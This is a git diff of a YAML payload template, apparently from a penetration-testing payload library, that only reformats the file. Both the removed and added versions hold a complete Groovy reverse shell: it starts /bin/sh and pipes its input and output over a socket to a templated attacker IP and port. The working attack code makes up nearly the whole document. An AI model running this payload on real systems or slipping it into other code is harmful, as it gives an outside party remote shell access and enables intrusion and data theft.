--- a/src/profi/templates/payloads/revshell-linux-groovy.yaml
+++ b/src/profi/templates/payloads/revshell-linux-groovy.yaml
@@ -1,14 +1,9 @@
+---
 metadata:
-  filename: revshell-linux-groovy.yaml
-  tags:
-  - shell
-  - linux
-  created: '2025-03-29'
-  author: Unknown
-content: 'String host="{{ attacker_ip }}";int port={{ shell_port }};String cmd="/bin/sh";Process
-  p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream
-  pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream
-  po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
-  {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
+  filename: "revshell-linux-groovy.yaml"
+  tags: ["shell", "linux"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  String host="{{ attacker_ip }}";int port={{ shell_port }};String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
